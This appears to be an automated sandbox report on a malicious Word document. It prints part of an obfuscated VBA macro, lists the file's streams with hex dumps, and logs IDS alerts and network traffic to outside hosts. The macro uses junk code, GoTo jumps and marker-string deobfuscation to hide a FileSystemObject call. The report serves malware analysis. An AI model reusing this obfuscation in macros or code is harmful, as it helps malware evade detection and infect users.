Set zxgLHJSFW = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim gxBPJB As Object
Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
gxBPJB.WriteLine "RhnJRGeBNASBQHHGF"
gxBPJB.WriteLine "WNFUDvHgghFdup"
gxBPJB.WriteLine "eeVVJBMGlcfXMB"
Set nleaHR = YZllAeRe
gxBPJB.Close
Set zxgLHJSFW = Nothing
Set mgTNFCq = hjZwD
Set gxBPJB = Nothing
gxBPJB:
Jlda77h_v8nx5 = Gnc9qzz9241pnhfi
   GoTo mgrwfmN
Dim RjiQHRA As Object
Set EhCMG = FUyIHBDFz
Set RjiQHRA = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim mgrwfmN As Object
Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
mgrwfmN.WriteLine "ptABFEZDmkMVIeD"
mgrwfmN.WriteLine "vVbvIHcFGEAJJ"
mgrwfmN.WriteLine "NisSEYrcDlKQUITa"
Set MNihxICY = AiRdGDAJ
mgrwfmN.Close
Set RjiQHRA = Nothing
Set wTMSLyWFG = AioOpBFE
Set mgrwfmN = Nothing
mgrwfmN:
End Function
Function Hrs2a1p95u19(Svk60sycz63sk)
Q491417n8n1 = Pg5minli2d3c9
   GoTo uWZkeMFv
Dim zDsRaIBGF As Object
Set ViWsSIH = sreXHFD
Set zDsRaIBGF = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim uWZkeMFv As Object
Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
uWZkeMFv.WriteLine "CcDmClHsnCC"
uWZkeMFv.WriteLine "aqGiHISIbAoabV"
uWZkeMFv.WriteLine "nJJzFRjEWpRikxCD"
Set QOrvJEB = eCIzUDyJ
uWZkeMFv.Close
Set zDsRaIBGF = Nothing
Set UskmBJF = yJmmmVIAG
Set uWZkeMFv = Nothing
uWZkeMFv:
Hrs2a1p95u19 = Replace(Svk60sycz63sk, "]a" + "nw[3", Ij2hesgjee57d3s0)
   GoTo iHKuDmaEr
Dim OMZxxg As Object
Set drZcHkCm = uVItICICB
Set OMZxxg = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim iHKuDmaEr As Object
Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
iHKuDmaEr.WriteLine "syYTHJShrguhzb"
iHKuDmaEr.WriteLine "TubioGUTLadgXbA"
iHKuDmaEr.WriteLine "oLweAMoGsqVE"
Set noebIvSiu = anyPG
iHKuDmaEr.Close
Set OMZxxg = Nothing
Set NXbmIuHX = YVZXECEHD
Set iHKuDmaEr = Nothing
iHKuDmaEr:
End Function

VBA File Name: Zdjtk46nm17voo, Stream Size: 701

General
Stream Path:	Macros/VBA/Zdjtk46nm17voo
VBA File Name:	Zdjtk46nm17voo
Stream Size:	701
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . I . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 49 85 8d 23 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name

VBA Code
`Attribute VB_Name = "Zdjtk46nm17voo"`

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 146

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	146
Entropy:	4.00187355764
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.280929556603
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . } . . . . . . . # . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 480

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	480
Entropy:	3.84824498439
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b0 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 6c 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 6412

General
Stream Path:	1Table
File Type:	data
Stream Size:	6412
Entropy:	6.14518057053
Base64 Encoded:	True
Data ASCII:	j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 99192

General
Stream Path:	Data
File Type:	data
Stream Size:	99192
Entropy:	7.3901039161
Base64 Encoded:	True
Data ASCII:	x . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . % . . P . 5 . . w . ? . . . . . . . . . . . . . . . D . . . . . = . . F . . . . . . % . . P . 5 . . w . ? . . . . . . . . . . .
Data Raw:	78 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 524

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	524
Entropy:	5.52955915132
Base64 Encoded:	True
Data ASCII:	I D = " { 9 1 6 F 7 B 9 1 - 5 D 2 F - 4 2 F E - 8 5 A 0 - A 5 1 0 E E 1 5 7 0 3 4 } " . . D o c u m e n t = A 5 g d 2 1 k l f q u 9 c 6 r s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Z d j t k 4 6 n m 1 7 v o o . . M o d u l e = O w p p n p 8 h a h 4 x o 7 8 8 . . E x e N a m e 3 2 = " F b 5 d 3 b h _ _ k e _ c w 4 p 7 7 " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 4 2 6 E E C 5 1 6 F E 1 A F E 1 A F E 1 A F E 1
Data Raw:	49 44 3d 22 7b 39 31 36 46 37 42 39 31 2d 35 44 32 46 2d 34 32 46 45 2d 38 35 41 30 2d 41 35 31 30 45 45 31 35 37 30 33 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 41 35 67 64 32 31 6b 6c 66 71 75 39 63 36 72 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 5a 64 6a 74 6b 34 36 6e 6d 31 37 76 6f 6f 0d 0a 4d 6f 64 75 6c 65 3d 4f 77 70 70 6e 70 38 68 61 68 34 78 6f 37 38

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 149

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	149
Entropy:	3.96410774314
Base64 Encoded:	False
Data ASCII:	A 5 g d 2 1 k l f q u 9 c 6 r s . A . 5 . g . d . 2 . 1 . k . l . f . q . u . 9 . c . 6 . r . s . . . Z d j t k 4 6 n m 1 7 v o o . Z . d . j . t . k . 4 . 6 . n . m . 1 . 7 . v . o . o . . . O w p p n p 8 h a h 4 x o 7 8 8 . O . w . p . p . n . p . 8 . h . a . h . 4 . x . o . 7 . 8 . 8 . . . . .
Data Raw:	41 35 67 64 32 31 6b 6c 66 71 75 39 63 36 72 73 00 41 00 35 00 67 00 64 00 32 00 31 00 6b 00 6c 00 66 00 71 00 75 00 39 00 63 00 36 00 72 00 73 00 00 00 5a 64 6a 74 6b 34 36 6e 6d 31 37 76 6f 6f 00 5a 00 64 00 6a 00 74 00 6b 00 34 00 36 00 6e 00 6d 00 31 00 37 00 76 00 6f 00 6f 00 00 00 4f 77 70 70 6e 70 38 68 61 68 34 78 6f 37 38 38 00 4f 00 77 00 70 00 70 00 6e 00 70 00 38 00 68

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5216

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	5216
Entropy:	5.49741129349
Base64 Encoded:	True
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 675

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	675
Entropy:	6.39671072877
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . { . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . Q . m . . . . ! O f f i c
Data Raw:	01 9f b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 7b 1a e4 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d

Stream Path: WordDocument, File Type: data, Stream Size: 21038

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	21038
Entropy:	4.09747048154
Base64 Encoded:	True
Data ASCII:	. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . M . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . R . . b . . . b . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 19 4d 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 52 00 00 62 7f 00 00 62 7f 00 00 19 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/06/21-15:49:01.865103	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.22	8.8.8.8
01/06/21-15:49:02.878845	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.22	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2021 15:48:57.919217110 CET	49165	80	192.168.2.22	104.18.61.59
Jan 6, 2021 15:48:57.964911938 CET	80	49165	104.18.61.59	192.168.2.22
Jan 6, 2021 15:48:57.965044975 CET	49165	80	192.168.2.22	104.18.61.59
Jan 6, 2021 15:48:57.967911959 CET	49165	80	192.168.2.22	104.18.61.59
Jan 6, 2021 15:48:58.013605118 CET	80	49165	104.18.61.59	192.168.2.22
Jan 6, 2021 15:48:58.024018049 CET	80	49165	104.18.61.59	192.168.2.22
Jan 6, 2021 15:48:58.024074078 CET	80	49165	104.18.61.59	192.168.2.22
Jan 6, 2021 15:48:58.024130106 CET	80	49165	104.18.61.59	192.168.2.22
Jan 6, 2021 15:48:58.024151087 CET	49165	80	192.168.2.22	104.18.61.59
Jan 6, 2021 15:48:58.024188995 CET	80	49165	104.18.61.59	192.168.2.22
Jan 6, 2021 15:48:58.024229050 CET	80	49165	104.18.61.59	192.168.2.22
Jan 6, 2021 15:48:58.024265051 CET	49165	80	192.168.2.22	104.18.61.59
Jan 6, 2021 15:48:58.118716002 CET	49166	80	192.168.2.22	104.27.144.251
Jan 6, 2021 15:48:58.169009924 CET	80	49166	104.27.144.251	192.168.2.22
Jan 6, 2021 15:48:58.169146061 CET	49166	80	192.168.2.22	104.27.144.251
Jan 6, 2021 15:48:58.169449091 CET	49166	80	192.168.2.22	104.27.144.251
Jan 6, 2021 15:48:58.219615936 CET	80	49166	104.27.144.251	192.168.2.22
Jan 6, 2021 15:48:58.230633020 CET	49165	80	192.168.2.22	104.18.61.59
Jan 6, 2021 15:48:58.263324022 CET	80	49166	104.27.144.251	192.168.2.22
Jan 6, 2021 15:48:58.263387918 CET	80	49166	104.27.144.251	192.168.2.22
Jan 6, 2021 15:48:58.263444901 CET	80	49166	104.27.144.251	192.168.2.22
Jan 6, 2021 15:48:58.263473034 CET	49166	80	192.168.2.22	104.27.144.251
Jan 6, 2021 15:48:58.263499975 CET	80	49166	104.27.144.251	192.168.2.22
Jan 6, 2021 15:48:58.263537884 CET	80	49166	104.27.144.251	192.168.2.22
Jan 6, 2021 15:48:58.263561010 CET	49166	80	192.168.2.22	104.27.144.251
Jan 6, 2021 15:48:58.445199966 CET	49167	80	192.168.2.22	209.59.139.39
Jan 6, 2021 15:48:58.480241060 CET	49166	80	192.168.2.22	104.27.144.251
Jan 6, 2021 15:48:58.606311083 CET	80	49167	209.59.139.39	192.168.2.22
Jan 6, 2021 15:48:58.606487036 CET	49167	80	192.168.2.22	209.59.139.39
Jan 6, 2021 15:48:58.606726885 CET	49167	80	192.168.2.22	209.59.139.39
Jan 6, 2021 15:48:58.766622066 CET	80	49167	209.59.139.39	192.168.2.22
Jan 6, 2021 15:48:58.767659903 CET	80	49167	209.59.139.39	192.168.2.22
Jan 6, 2021 15:48:58.767731905 CET	80	49167	209.59.139.39	192.168.2.22
Jan 6, 2021 15:48:58.767774105 CET	80	49167	209.59.139.39	192.168.2.22
Jan 6, 2021 15:48:58.767812967 CET	80	49167	209.59.139.39	192.168.2.22
Jan 6, 2021 15:48:58.767833948 CET	49167	80	192.168.2.22	209.59.139.39
Jan 6, 2021 15:48:58.767872095 CET	80	49167	209.59.139.39	192.168.2.22
Jan 6, 2021 15:48:58.767910004 CET	49167	80	192.168.2.22	209.59.139.39
Jan 6, 2021 15:48:58.767923117 CET	80	49167	209.59.139.39	192.168.2.22
Jan 6, 2021 15:48:58.767965078 CET	80	49167	209.59.139.39	192.168.2.22
Jan 6, 2021 15:48:58.767995119 CET	49167	80	192.168.2.22	209.59.139.39
Jan 6, 2021 15:48:58.768023968 CET	49167	80	192.168.2.22	209.59.139.39
Jan 6, 2021 15:48:58.774373055 CET	49167	80	192.168.2.22	209.59.139.39
Jan 6, 2021 15:48:58.934142113 CET	80	49167	209.59.139.39	192.168.2.22
Jan 6, 2021 15:49:01.218420982 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:01.491822958 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:01.492033958 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:01.492264986 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:01.765124083 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:01.778521061 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:01.778556108 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:01.778568029 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:01.778579950 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:01.778594971 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:01.778606892 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:01.778621912 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:01.778634071 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:01.778650045 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:01.778666973 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:01.778887987 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.052279949 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.052349091 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.052377939 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.052416086 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.052453995 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.052491903 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.052531004 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.052563906 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.052568913 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.052663088 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.052706957 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.052750111 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.052761078 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.052788973 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.052826881 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.052865028 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.052865982 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.052902937 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.052926064 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.052942991 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.052983999 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.052987099 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.053035021 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.053077936 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.053078890 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.053117037 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.053157091 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.053157091 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.053525925 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.326340914 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326380968 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326405048 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326428890 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326442003 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.326452971 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326476097 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.326478004 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326507092 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326520920 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.326632977 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326658964 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326675892 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.326684952 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326710939 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326720953 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.326735973 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326761007 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326772928 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.326786041 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326814890 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326828957 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.326841116 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326865911 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326886892 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.326889992 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326915026 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326931953 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.326940060 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326963902 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.326987028 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327007055 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.327013969 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327023983 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.327039957 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327074051 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.327075005 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327086926 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327111959 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327122927 CET	49168	80	192.168.2.22	210.86.239.69
Jan 6, 2021 15:49:02.327140093 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327167034 CET	80	49168	210.86.239.69	192.168.2.22
Jan 6, 2021 15:49:02.327178001 CET	49168	80	192.168.2.22	210.86.239.69
